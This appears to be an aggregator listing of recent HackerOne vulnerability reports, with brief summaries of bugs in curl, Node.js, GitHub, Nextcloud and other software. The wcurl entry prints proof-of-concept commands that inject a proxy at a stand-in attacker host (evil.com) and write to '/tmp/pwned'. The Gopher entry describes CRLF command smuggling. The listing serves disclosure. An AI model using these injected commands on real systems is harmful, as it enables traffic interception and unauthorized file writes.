HackerOne Recent

15267 matches found

Hacker One, added 2026/02/28 8:07 p.m., 11 views

IBM: SQL Injection vulnerability found on ibm.com endpoint

A SQL injection vulnerability was found on an ibm.com endpoint. The vulnerability was reported to IBM, analyzed, and remediated...

AI score 5.8, Exploits 0

Hacker One, added 2026/02/26 2:30 p.m., 11 views

curl: Curl Telnet Handler Buffer Overflow

Summary: I found a buffer overflow in curl's telnet protocol handler that allows remote memory corruption without authentication. The bug is in the CURL_SB_ACCUM macro in lib/telnet.c line 69, where the bounds check lets you write one byte past the end of a 512-byte buffer. When curl receives 512+...

AI score 6.2, Exploits 0

Hacker One, added 2026/02/26 10:53 a.m., 12 views

curl: RTSP RTP Interleaved Parser Assertion Failure (Zero-Length RTP Payload)

Summary: I am submitting this as a security issue primarily due to how it was discovered and that it's my first Curl submission, but I suspect I might be overly cautious here. This issue was discovered as part of the AIXCC competition, and I am assisting on reporting true positive findings to...

AI score 5.9, Exploits 0

Hacker One, added 2026/02/26 10:52 a.m., 9 views

curl: Integer Overflow in curl_multi_get_handles() Leading to Heap Buffer Overflow

Summary: The curl_multi_get_handles() function in lib/multi.c contains an integer overflow vulnerability when the number of easy handles in a multi handle approaches UINT_MAX (4,294,967,295). When count == UINT_MAX, the expression coun...

AI score 6.9, Exploits 0

Hacker One, added 2026/02/26 4:11 a.m., 10 views

curl: Able to bypass HSTS using trailing dot

Summary: curl allows users to load an HSTS cache, which will cause curl to use HTTPS instead of HTTP given an HTTP URL for a site specified in the HSTS cache. Affected version: the curl version used for reproducing this issue is 8.16.0. curl --version: curl 8.16.0 (Windows) libcurl/8.16.0 Schannel...

AI score 5.4, Exploits 0

Hacker One, added 2026/02/25 8:48 a.m., 5 views

Nextcloud: Group restriction bypass via bearer token in user_oidc (SETTING_RESTRICT_LOGIN_TO_GROUPS not enforced in Backend::getCurrentUserId)

A security inconsistency was identified in the user_oidc app where group-based login restrictions were enforced in the browser OIDC flow but not in bearer token validation. This could have allowed users outside whitelisted groups to access the Nextcloud API with a valid bearer token...

AI score 5.8, Exploits 0

Hacker One, added 2026/02/20 10:54 a.m., 4 views

Rocket.Chat: Complete authentication bypass to admin permissions

Vulnerability description not provided...

CVSS 9.8, AI score 5.7, EPSS 0.00066, Exploits 0

Hacker One, added 2026/02/18 12:17 p.m., 5 views

Node.js: Denial of Service via `__proto__` header name in `req.headersDistinct` (Uncaught `TypeError` crashes Node.js process)

Vulnerability description not provided...

CVSS 7.5, AI score 6.7, EPSS 0.00042, Exploits 0

Hacker One, added 2026/02/18 7:42 a.m., 5 views

GitHub: Cross-repository IDOR in `/settings/security_analysis/bypass_reviewers` allows unauthorized delegated bypass reviewer modification

A vulnerability was identified in GitHub Enterprise Server that allowed an attacker with admin access on one repository to modify the secret scanning push protection delegated bypass reviewer list on another repository. Authorization was verified against the repository in the URL, but the action...

CVSS 5.3, AI score 5.9, EPSS 0.00073, Exploits 0

Hacker One, added 2026/02/17 8:39 p.m., 6 views

Node.js: Node.js Permission Model bypass: UDS server bind/listen works without `--allow-net`

Vulnerability description not provided...

CVSS 5.3, AI score 6.2, EPSS 0.00004, Exploits 0

Hacker One, added 2026/02/16 10:41 p.m., 6 views

Python Cryptographic Authority: Fail-Open in set_tlsext_servername_callback on pyopenssl via unhandled exceptions leads to security bypass

A vulnerability was discovered in the pyopenssl library's handling of the Server Name Indication (SNI) callback set_tlsext_servername_callback. The internal wrapper for this callback catches all Python exceptions raised by user code but returns 0 (Success / SSL_TLSEXT_ERR_OK) to the underlying OpenSSL engine...

AI score 5.8, Exploits 0

Hacker One, added 2026/02/16 8:11 a.m., 8 views

AWS VDP: Arbitrary Code Execution via Scanner Bypass in **aws-diagram-mcp-server** `exec()` Namespace

Description: The aws-diagram-mcp-server contains an arbitrary code execution vulnerability in diagrams_tools.py. User-supplied Python code is executed via exec(code, namespace) at line 305 with a namespace containing the full os module, urlretrieve, and Python builtins. A security scanner (scanner.py)...

AI score 6.4, Exploits 0

Hacker One, added 2026/02/16 12:22 a.m., 11 views

PortSwigger Web Security: HTML Injection in DAST Trial Request Form Confirmation Email – PortSwigger

A vulnerability was discovered in the DAST trial request form on the website, where user input in the "First Name" field was not properly sanitized before being included in confirmation emails. This allowed the injection of arbitrary HTML content, which would be rendered in the recipient's email...

AI score 5.7, Exploits 0

Hacker One, added 2026/02/15 10:15 p.m., 8 views

Node.js: Incomplete fix for CVE-2026-21637: loadSNI() in _tls_wrap.js lacks try/catch leading to Remote DoS

A flaw was discovered in the Node.js TLS error handling that left SNICallback invocations unprotected against synchronous exceptions. This represented an incomplete fix of the prior CVE-2026-21637 vulnerability, where the equivalent ALPN and PSK callbacks were already addressed. The issue could...

CVSS 7.5, AI score 5.8, EPSS 0.00056, Exploits 0

Hacker One, added 2026/02/09 8:44 p.m., 6 views

Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash

An assertion error in node_url.cc via malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...

CVSS 5.7, AI score 6.3, EPSS 0.00033, Exploits 0

Hacker One, added 2026/02/07 3:59 p.m., 4 views

Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure

The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...

AI score 5.8, Exploits 0

Hacker One, added 2026/02/06 9:22 p.m., 6 views

RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy

The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.new(value).match?(claim_value), where value was fully user-controlled and claim_value w...

AI score 5.8, Exploits 0

Hacker One, added 2026/02/01 1:35 p.m., 9 views

Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery

Vulnerability description not provided...

CVSS 5.9, AI score 6.2, EPSS 0.00012, Exploits 0

Hacker One, added 2026/01/30 2:35 p.m., 5 views

Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion

Vulnerability description not provided...

CVSS 5.3, AI score 6.2, EPSS 0.00019, Exploits 0

Hacker One, added 2026/01/30 7:05 a.m., 39 views

curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length

I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl's MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...

AI score 5.9, Exploits 0

Hacker One, added 2026/01/27 11:26 p.m., 6 views

GitHub: Add labels to arbitrary issues/prs & compromise github actions label checks

A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...

CVSS 5.3, AI score 5.8, EPSS 0.0003, Exploits 0

Hacker One, added 2026/01/26 11:03 a.m., 8 views

Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored

A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...

CVSS 3.7, AI score 5.9, EPSS 0.0002, Exploits 0

Hacker One, added 2026/01/25 4:20 p.m., 34 views

curl: wcurl Argument Injection via Unquoted Variable

When I was code auditing curl I stumbled upon a vulnerability that was in wcurl. Affected version: current. Step 1: open terminal. Step 2: run the PoCs below: wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

AI score 6, Exploits 0

Hacker One, added 2026/01/25 11:41 a.m., 6 views

Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw

A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...

AI score 5.9, Exploits 0

Hacker One, added 2026/01/25 12:02 a.m., 13 views

curl: Integer Underflow in src/var.c

Summary: A potential integer underflow vulnerability was identified in the setvariable function within src/var.c. The flaw occurs during the calculation of the variable content length (clen) when a byte range is specified. Specifically, the code fails to validate if startoffset is greater than...

AI score 5.9, Exploits 0

Hacker One, added 2026/01/23 7:13 p.m., 8 views

GitHub: PATs without the required scope can leak issues

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS 5.3, AI score 5.8, EPSS 0.00026, Exploits 0

Hacker One, added 2026/01/23 4:07 a.m., 5 views

Nextcloud: View-only guests could see deleted Collectives pages in the trashbin

A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...

CVSS 2.6, AI score 5.8, EPSS 0.00025, Exploits 0

Hacker One, added 2026/01/21 3:07 a.m., 4 views

Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos

Summary: An Insecure Direct Object Reference (IDOR) vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...

AI score 5.9, Exploits 0

Hacker One, added 2026/01/20 9:29 p.m., 5 views

Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate

A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...

CVSS 9.1, AI score 5.4, EPSS 0.00013, Exploits 3

Hacker One, added 2026/01/19 8:10 p.m., 52 views

curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends

Summary: The SSL options ISSUERCERT, EC_CURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce the security and compliance by ignoring the specified curve for the EC_CURVES bug. Affected version: Tested with...

AI score 5.8, Exploits 0

Hacker One, added 2026/01/19 6:46 p.m., 21 views

curl: Cross-origin cookies leak and injection risk when using a custom Host header

Summary: When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists in cross-origin redirects even though the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...

AI score 5.7, Exploits 0

Hacker One, added 2026/01/19 10:27 a.m., 22 views

curl: Cookie Replacement Use-After-Free Vulnerability

Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replace_existing function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...

AI score 6.1, Exploits 0

Hacker One, added 2026/01/19 10:12 a.m., 10 views

curl: Cookie Max-Age Integer Overflow Vulnerability

Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection. While the code includes an overflo...

AI score 5.7, Exploits 0

Hacker One, added 2026/01/17 11:59 a.m., 18 views

Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking

A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy (BLE), causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...

CVSS 7.1, AI score 5.5, EPSS 0.00007, Exploits 14

Hacker One, added 2026/01/17 7:52 a.m., 35 views

curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects

Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...

CVSS 5.7, AI score 7.4, EPSS 0.00314, Exploits 2

Hacker One, added 2026/01/17 3:04 a.m., 10 views

AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation

Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...

AI score 5.6, Exploits 0

Hacker One, added 2026/01/16 4:43 a.m., 5 views

Nextcloud: Private circle can be added to another circle via API despite visibility restriction

A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...

CVSS 2.6, AI score 5.8, EPSS 0.00025, Exploits 0

Hacker One, added 2026/01/15 10:00 p.m., 4 views

Node.js: HashDoS in V8

Vulnerability description not provided...

CVSS 5.9, AI score 6.5, EPSS 0.00033, Exploits 0

Hacker One, added 2026/01/14 3:27 p.m., 12 views

Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service

Summary of Impact CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...

AI score 6, Exploits 0

Hacker One, added 2026/01/14 5:02 a.m., 22 views

GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent

Summary: The GoCD Agent's logging mechanism (Logback) allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...

AI score 5.6, Exploits 0

Hacker One, added 2026/01/13 9:02 p.m., 19 views

curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)

Summary: A directory listing vulnerability is disclosing names, emails and much other sensitive information, which significantly increases the severity because these are considered PII (Personally Identifiable Information). Thousands of records, publicly accessible without auth, also can be...

AI score 6.7, Exploits 0

Hacker One, added 2026/01/13 8:07 p.m., 9 views

curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing

libcurl incorrectly parses IMAP literal sizes even when they are embedded within quoted strings (e.g., email subjects or headers). This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...

AI score 7, Exploits 0

Hacker One, added 2026/01/13 2:31 p.m., 9 views

curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check

Summary: An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version: libcurl 8.18.0. Tested on macOS arm64 with AddressSanitizer enabled. Steps ...

AI score 7.3, Exploits 0

Hacker One, added 2026/01/13 1:30 p.m., 11 views

curl: Digest Authentication Header Injection

Summary: The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using auth_digest_string_quoted, the uri is inserted raw into the header. This allows an...

AI score 7.5, Exploits 0

Hacker One, added 2026/01/13 1:16 p.m., 11 views

curl: Gopher Protocol Command Injection (SSRF Smuggling)

Summary: The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...

AI score 8.1, Exploits 0

Hacker One, added 2026/01/13 11:39 a.m., 9 views

curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests

The API returns struct curl_header objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curl_header objects remain valid to the application an...

AI score 7.8, Exploits 0

Hacker One, added 2026/01/13 7:12 a.m., 10 views

curl: Integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit

Summary: A logic error involving an integer overflow (specifically, an unsigned integer underflow) exists in the lib/mqtt.c file within the mqtt_publish function. This vulnerability allows an attacker (or a malicious user configuration) to bypass the explicit MAX_MQTT_MESSAGE_SIZE check. The vulnerabilit...

AI score 7.3, Exploits 0

Hacker One, added 2026/01/13 12:50 a.m., 13 views

curl: Integer-underflow leads to heap over-read in TFTP implementation

libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...

AI score 6.8, Exploits 0

Hacker One, added 2026/01/12 2:25 a.m., 3 views

MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing

A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...

AI score 5.6, Exploits 0

Hacker One, added 2026/01/10 7:52 p.m., 4 views

GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration

A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...

CVSS 6.5, AI score 5.9, EPSS 0.00193, Exploits 0

Total number of security vulnerabilities: 15267